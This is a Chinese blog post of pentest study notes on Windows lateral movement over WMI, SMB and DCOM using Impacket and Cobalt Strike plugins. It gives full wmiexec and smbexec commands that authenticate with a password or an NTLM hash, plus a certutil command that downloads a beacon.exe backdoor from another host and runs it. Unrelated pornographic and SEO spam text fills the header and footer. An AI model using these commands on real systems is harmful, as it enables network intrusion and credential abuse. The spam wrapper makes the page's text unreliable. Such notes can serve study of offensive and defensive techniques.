<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      第179-180天:橫向移動篇&入口切換&SMB共享&WMI管道&DCOM組件&Impacket套件&CS插件

      學習的目的

      windows 2012以上默認關閉了Wdigest,所以攻擊者無法通過內存獲取到明文密碼
      為了針對以上情況 所以有四種方法解決:
      1.利用(PTH,PTK)等進行移動不需要明文
      2.利用其他服務協議(SMB/WMI等進行哈希移動)
      3.利用注冊表開啟(wdigest auth)進行獲取、
      4.利用工具或者第三方平臺(HASHCAT進行破解獲取)
      image

      WMI

      WMI全稱"windows管理規范",從win2003開始一直存在。它原本的作用是方便管理員對windows主機進行管理。因此在內網滲透中,我們可以使用WMI進行橫向移動,支持用戶名明文或者hash的方式進行認證,并且該方法不會在目標日志系統留下痕跡。
      利用條件:
      1、WMI服務開啟,端口135,默認開啟。
      2、防火墻允許135、445等端口通信。
      3、知道目標機的賬戶密碼或HASH。

      wmi橫向移動的使用:wmiexec-impacket (主要使用方法)

      python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32
      python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "whoami"
      python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c sqlserver/administrator@192.168.3.32 "whoami"
      下載后門:
      python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"
      執行后門:
      python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "c:/beacon.exe"
      

      通過wmic 進行后門上線,這邊的主機名和用戶名是通過前期的信息收集收集而來的
      image

      SMB服務

      SMB服務通常由文件服務器提供,它允許客戶端計算機通過網絡訪問服務器上的共享資源。通過SMB用戶可以在網絡上訪問和共享文件夾、文件以及打印機,從而實現在不同計算機之間方便地共享數據和打印輸出。利用SMB可通過明文或HASH傳遞來遠程執行。
      利用條件:
      1、文件與打印機服務開啟,默認開啟。
      2、防火墻允許135、445等端口通信。
      3、知道目標機的賬戶密碼或HASH。

      利用方法
      法一,smbexec-impacket

      外部:(交互式)
      python smbexec.py sqlserver/administrator:admin!@#45@192.168.3.32
      python smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c sqlserver/administrator@192.168.3.32
      

      法二4.CS插件:
      cs-psexec
      SMB橫向移動:
      推薦使用impacket和CS插件
      image

      image

      IIS服務器的目錄 c:\inetpub\wwwroot
      image

      通過wmic 進行后門上線,這邊的主機名和用戶名是通過前期的信息收集收集而來的
      image

      有可以直接進行交互式的工具以及CS的插件cscript(不建議使用)

      SMB橫向移動:
      推薦使用impacket和CS插件
      image

      image

      dcom是通過powershell進行利用的,只有windows7(windows server8)以后的版本才有powershell,并且需要關閉防火墻,比較雞肋。

      實戰當中,要去分析防火墻限制了什么協議,然后再來選擇通過上面方式進行橫向移動
      像SMB這種就需要開放文件和打印機共享,怎么判斷限制了什么協議,就可以直接使用impacket里面的代碼進行攻擊,成功的話就是可以

      電腦是默認打開文件和打印機共享的,所以正常是可以使用SMB進行橫向移動的
      image

      主要注意幾個點:
      (1)使用命令攻擊時計算機名需要寫入,分清域內用戶和域外用戶
      (2)wmi,smb,dcom三個橫向手法所需要的條件,并且要學會什么時候使用什么協議進行攻擊,也就是用impacket進行探測,探測成功后進行使用
      (3)掌握明文和非明文(hash)的攻擊方法
      (4)掌握計算機名的信息收集,主要是通過spn收集,systeminfo,net view /domain

      posted @ 2025-11-02 17:56  JuneCy  閱讀(6)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 最近免费中文字幕大全免费版视频| 久久天堂综合亚洲伊人HD妓女| 国日韩精品一区二区三区| 国产极品视频一区二区三区 | 乱色精品无码一区二区国产盗| 四虎库影成人在线播放| 欧洲精品色在线观看| 亚洲高清WWW色好看美女| 在线中文字幕第一页| 四虎国产精品永久入口| 一区二区三区自拍偷拍视频| 欧美videos粗暴| 免费国产拍久久受拍久久| 亚洲国产精品一区二区三| 人人妻一区二区三区| 国产精品户外野外| 欧美肥老太交视频免费| 国产精品中文字幕视频| 在线免费播放av观看| 亚洲精品成人福利网站| 男女激情一区二区三区| 撕开奶罩揉吮奶头高潮AV| 国精品无码一区二区三区在线看| 熟女激情乱亚洲国产一区| 成人性生交片无码免费看| 久久精品国产久精国产| 日本中文字幕一区二区三| 成人性生交大片免费看中文| 国产69精品久久久久人妻刘玥| 国产免费高清69式视频在线观看| 欧美日韩性高爱潮视频| 国内精品视频一区二区三区八戒 | 亚洲精品天堂一区二区| 中文字幕亚洲综合久久| 狠狠v日韩v欧美v| 欧美日韩性高爱潮视频| 德格县| 又大又粗又爽的少妇免费视频 | 国内自拍视频在线一区| 久久精品国产99久久六动漫| 欧美寡妇xxxx黑人猛交|